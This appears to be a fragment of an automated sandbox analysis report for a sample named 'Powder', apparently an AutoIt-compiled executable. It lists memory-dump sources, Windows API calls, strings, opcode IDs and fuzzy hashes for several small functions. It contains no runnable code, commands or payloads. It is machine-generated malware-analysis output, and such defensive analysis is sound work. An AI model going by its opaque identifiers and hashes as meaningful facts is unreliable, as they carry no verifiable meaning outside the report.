                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: c68b3410a9ffa4b635d775851c52b40b49f4e71cbd84069f177ef5ac5e106671
                                                  • Instruction ID: 821a192e9f3ee36c279447103848b8af5752d833dc5358884a80f6ebe8bd0e4f
                                                  • Opcode Fuzzy Hash: c68b3410a9ffa4b635d775851c52b40b49f4e71cbd84069f177ef5ac5e106671
                                                  • Instruction Fuzzy Hash: 79E09B736003291BD710A69AAC49E97F7ACDB55771F001067B904E6151D5A0994587D0
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E588A0
                                                    • Part of subcall function 00E23588: _doexit.LIBCMT ref: 00E23592
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 6ab2e028a634ac1d9f3963865220bc43e28538f4b23a81e547df4e36d659a4d5
                                                  • Instruction ID: a495423b4cdbc4ab21265d8f89eea5507b50f83819182a970ce6de962e6197e5
                                                  • Opcode Fuzzy Hash: 6ab2e028a634ac1d9f3963865220bc43e28538f4b23a81e547df4e36d659a4d5
                                                  • Instruction Fuzzy Hash: 63D05B7238536C36D61432B47D0BFCF7A888B05B51F44543BFB08755C349D585D042D5
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00E40091
                                                    • Part of subcall function 00E7C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00E4027A,?), ref: 00E7C6E7
                                                    • Part of subcall function 00E7C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C6F9
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E40289
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: c653c65bba92ba52032e7ef5fb9e573d4f04e51e2f5b513e4b43e842f41a2589
                                                  • Instruction ID: b8cab468cacd96f20123e70f276cf9397f16bdc75f5a8de8354bceb6ef04babc
                                                  • Opcode Fuzzy Hash: c653c65bba92ba52032e7ef5fb9e573d4f04e51e2f5b513e4b43e842f41a2589
                                                  • Instruction Fuzzy Hash: 3CF0ED71805109DFCB15DBA1DA98BECBBF8AB48304F6424A6E246B21A0CB715F84DF21
                                                  APIs
                                                  • DestroyIcon.USER32(,z,00EC7A2C,00EC7890,?,00E15A53,00EC7A2C,00EC7A30,?,00000004), ref: 00E15823
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: DestroyIcon
                                                  • String ID: ,z$SZ
                                                  • API String ID: 1234817797-2661083866
                                                  • Opcode ID: 839ef0957dc9c2caeca599d8f59bd7e8e3a87c5997ba3cb8cc825ba717fa4391
                                                  • Instruction ID: e75cbe79009702c1a5da08983ef1e18e33d8082b69a0d2178cb7bc5d996fb4f0
                                                  • Opcode Fuzzy Hash: 839ef0957dc9c2caeca599d8f59bd7e8e3a87c5997ba3cb8cc825ba717fa4391
                                                  • Instruction Fuzzy Hash: 1AE0C73301428AEFEB241F49E800BD4FBE8AFA1331F648027E48066060D3B168E0CB90